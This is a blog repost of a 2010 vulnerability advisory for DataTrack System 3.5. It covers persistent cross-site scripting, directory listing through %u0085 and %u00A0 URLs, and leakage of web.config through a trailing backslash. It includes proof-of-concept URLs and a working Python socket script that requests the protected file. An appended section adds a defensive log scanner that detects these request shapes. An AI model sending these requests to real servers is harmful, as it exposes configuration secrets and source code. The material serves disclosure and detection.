♺ Google is the best teacher ♺ | University of Gunadarma IT ☺

DataTrack System 3.5 persistent cross site scripting


# Vulnerability............Persistent Cross-Site Scripting
#
# Directory Disclosure
#
# Configuration Disclosure
#
# Source Disclosure
#
# Software.................DataTrack System 3.5
#
# Download.................http://www.magnoware.com/Downloads.aspx
#
# Date.....................5/17/10
#
#
#
#============================================================================================================#
#
#
# Site.....................http://cross-site-scripting.blogspot.com/
#
# Email....................john.leitch5@gmail.com
#
#
#
#============================================================================================================#
#
#
# ##Description##
#
#
#
# User submitted data is not HTML entity encoded before it is rendered.
#
#
#
#
#
# ##Exploit##
#
#
#
# Log in using the web client and submit a request with summary set to . Navigate
# to My History to see the result.
#
#
#
#============================================================================================================#
#
#
# ##Description##
#
#
#
# The contents of the root directory can be listed by using a specially crafted URL.
#
#
#
#
# ##Exploit##
#
#
#
# %u0085
#
# %u00A0
#
#
#
#
#
# ##Proof of Concept##
#
#
#
# http://localhost/%u0085/
#
# http://localhost/%u00A0/
#
#
#
#============================================================================================================#
#
#
# ##Description##
#
#
#
# Forbidden file types (e.g. ascx, config) can be downloaded by appending a backslash to the filename.
#
#
#
#
# ##Exploit##
#
#
#
# GET /web.config\ HTTP/1.1
#
# Host: localhost
#
#
#
#
#
# ##Proof of Concept##
#
#
#
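import socket

host = 'localhost'
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
# Request the forbidden file with a backslash appended to the filename
request = ('GET /web.config\\ HTTP/1.1\r\n'
           'Host: ' + host + '\r\n\r\n')
s.sendall(request.encode('ascii'))

# Print the response until the server closes the connection
while True:
    response = s.recv(8192)
    if not response:
        break
    print(response.decode('latin-1'), end='')
s.close()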
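
Added example, not part of the original advisory: a log check for the two request shapes described above (a %uXXXX escape in the path, and a forbidden file type followed by a trailing backslash). The access-log layout, the function names and the extension list are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import unquote

# Extensions the advisory names as forbidden; extend for your deployment (assumption).
FORBIDDEN_EXT = (".config", ".ascx")
PCT_U = re.compile(r"%u[0-9a-fA-F]{4}")   # non-standard %uXXXX escape
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify(target):
    """Return the reasons a request target matches the advisory's request shapes."""
    reasons = []
    path = target.split("?", 1)[0]
    if PCT_U.search(path):
        reasons.append("pct-u-escape")
    decoded = unquote(path)               # normalise percent-encoding before matching
    stem = decoded.rstrip("\\")
    if stem != decoded and stem.lower().endswith(FORBIDDEN_EXT):
        reasons.append("forbidden-ext-trailing-backslash")
    return reasons


def scan(log_lines):
    """Yield (line_number, target, reasons) for every flagged access-log line."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match:
            reasons = classify(match.group(1))
            if reasons:
                yield number, match.group(1), reasons


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '127.0.0.1 - - [17/May/2010:10:00:01] "GET /Default.aspx HTTP/1.1" 200',
    '127.0.0.1 - - [17/May/2010:10:00:02] "GET /%u0085/ HTTP/1.1" 200',
    '127.0.0.1 - - [17/May/2010:10:00:03] "GET /web.config\\ HTTP/1.1" 200',
    '127.0.0.1 - - [17/May/2010:10:00:04] "GET /web.config HTTP/1.1" 404',
]

if __name__ == "__main__":
    for number, target, reasons in scan(SAMPLE_LOG):
        print(number, target, ", ".join(reasons))
```

A 200 status on a flagged line is the case to investigate first, since it means the server answered the request instead of refusing it.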


References: http://securityreason.com/wlb_show/WLB-2010050112
  • May 20, 2010